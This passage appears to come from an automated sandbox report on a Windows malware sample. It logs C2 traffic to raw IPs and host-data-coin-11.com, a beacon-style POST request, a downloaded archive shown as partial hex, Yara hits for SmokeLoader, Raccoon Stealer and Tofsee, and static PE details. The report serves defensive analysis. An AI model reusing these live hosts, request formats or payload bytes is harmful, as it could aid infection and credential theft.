33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:26:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 08:26:22 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:57 GMTETag: "61d8c845-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 
4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rftojqy.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 230 | Host: host-data-coin-11.com
                          Source: unknown | HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49784 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49801 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.4:49867 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49869 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49881 version: TLS 1.2
                          Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49888 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing:

                          Yara detected SmokeLoader
                          Source: Yara match | File source: 10.0.rifsswe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 1.1.tijXCZsbGe.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 1.2.tijXCZsbGe.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 10.2.rifsswe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 10.0.rifsswe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.tijXCZsbGe.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 9.2.rifsswe.6315a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 10.0.rifsswe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 10.1.rifsswe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0000000A.00000002.767900095.0000000000640000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000001.00000002.719913794.0000000000591000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 0000000A.00000002.768056484.00000000022F1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000001.00000002.719885078.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000005.00000000.708378047.0000000004DF1000.00000020.00020000.sdmp, type: MEMORY
                          Source: 9334.exe, 0000000B.00000000.767215703.000000000069A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                          E-Banking Fraud:

                          Yara detected Raccoon Stealer
                          Source: Yara match | File source: 38.2.5C89.exe.4d40e50.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 38.2.5C89.exe.4d40e50.4.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 38.3.5C89.exe.4de0000.3.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 38.2.5C89.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 38.3.5C89.exe.4de0000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 38.2.5C89.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000026.00000003.868438969.0000000004DE0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000032.00000002.920325973.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000026.00000002.1024945743.0000000004D40000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000032.00000003.917559502.0000000004DF0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000032.00000002.931172576.0000000004D50000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000026.00000002.953575570.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: 5C89.exe PID: 5200, type: MEMORYSTR

                          Spam, unwanted Advertisements and Ransom Demands:

                          Yara detected Tofsee
                          Source: Yara match | File source: 34.2.svchost.exe.5d0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 32.2.gecrjwsv.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 17.2.E748.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 34.2.svchost.exe.5d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 32.2.gecrjwsv.exe.5a0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 32.3.gecrjwsv.exe.5a0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 32.2.gecrjwsv.exe.580e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 17.2.E748.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 32.2.gecrjwsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 32.2.gecrjwsv.exe.5a0000.2.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 17.2.E748.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 17.3.E748.exe.650000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000020.00000002.803587070.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000020.00000002.803962316.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000011.00000002.953428772.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000011.00000002.957118764.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000022.00000002.949927934.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000020.00000003.801375609.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000020.00000002.803904384.0000000000580000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000011.00000003.783551055.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: E748.exe PID: 5476, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: gecrjwsv.exe PID: 2860, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6732, type: MEMORYSTR

                          System Summary:

                          PE file has nameless sections
                          Source: 8783.exe.5.dr | Static PE information: section name:
                          Source: 8783.exe.5.dr | Static PE information: section name:
                          Source: 8783.exe.5.dr | Static PE information: section name:
                          Source: 8783.exe.5.dr | Static PE information: section name:
                          Source: 8783.exe.5.dr | Static PE information: section name:
                          Source: 8783.exe.5.dr | Static PE information: section name:
                          Source: 9DFA.exe.5.dr | Static PE information: section name:
                          Source: 9DFA.exe.5.dr | Static PE information: section name:
                          Source: 9DFA.exe.5.dr | Static PE information: section name:
                          Source: 9DFA.exe.5.dr | Static PE information: section name:
                          Source: 9DFA.exe.5.dr | Static PE information: section name:
                          Source: 9DFA.exe.5.dr | Static PE information: section name:
                          Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7100 -ip 7100
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Code function: 0_2_00425030
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Code function: 0_2_0042B410
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Code function: 0_2_0042A630
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Code function: 1_2_00402A5F
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Code function: 1_2_00402AB3
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Code function: 1_1_00402A5F
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Code function: 1_1_00402AB3
                          Source: C:\Users\user\AppData\Roaming\rifsswe | Code function: 9_2_00633253
                          Source: C:\Users\user\AppData\Roaming\rifsswe | Code function: 9_2_006331FF
                          Source: C:\Users\user\AppData\Roaming\rifsswe | Code function: 10_2_00402A5F
                          Source: C:\Users\user\AppData\Roaming\rifsswe | Code function: 10_2_00402AB3
                          Source: C:\Users\user\AppData\Roaming\rifsswe | Code function: 10_1_00402A5F
                          Source: C:\Users\user\AppData\Roaming\rifsswe | Code function: 10_1_00402AB3
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe | Code function: 11_2_004027CA
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe | Code function: 11_2_00401FF1
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe | Code function: 11_2_0040158E
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe | Code function: 11_2_004015A6
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe | Code function: 11_2_004015BC
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe | Code function: 11_2_00411065
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe | Code function: 11_2_00412A02
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe | Code function: 11_2_0040CAC5
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe | Code function: 11_2_00410B21
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe | Code function: 11_2_004115A9
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe | Code function: 11_2_0048160C
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe | Code function: 11_2_004815DE
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe | Code function: 11_2_004815F6
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Code function: 16_2_00410800
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Code function: 16_2_00411280
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Code function: 16_2_004103F0
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Code function: 16_2_004109F0
                          Source: C:\Users\user\AppData\Local\Temp\E748.exe | Code function: 17_2_0040C913
                          Source: C:\Users\user\AppData\Local\Temp\E748.exe | Code function: 17_2_0042B030
                          Source: C:\Users\user\AppData\Local\Temp\E748.exe | Code function: 17_2_0042A250
                          Source: C:\Users\user\AppData\Local\Temp\E748.exe | Code function: 17_2_00424C50
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe | Code function: 18_2_02E596F0
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe | Code function: 18_2_02E50460
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe | Code function: 18_2_02E50470
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe | Code function: 18_2_02EDDE18
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe | Code function: 18_2_02ED8658
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe | Code function: 18_2_02EDCC48
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe | Code function: 18_2_02ED8DE8
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe | Code function: 18_2_02ED8DF8
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe | Code function: 18_2_02ED8DF4
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe | Code function: 32_2_0040C913
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe | Code function: 32_2_0042B030
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe | Code function: 32_2_0042A250
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe | Code function: 32_2_00424C50
                          Source: C:\Users\user\AppData\Local\Temp\E748.exe | Code function: 17_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                          Source: tijXCZsbGe.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tijXCZsbGe.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tijXCZsbGe.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tijXCZsbGe.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 6FB4.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 6FB4.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 6FB4.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 6FB4.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 9334.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 9334.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 9334.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: DB31.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: DB31.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: DB31.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: DB31.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E748.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E748.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E748.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E748.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: B0F7.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: B0F7.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: B0F7.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: C7FA.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 5C89.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 5C89.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 5C89.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
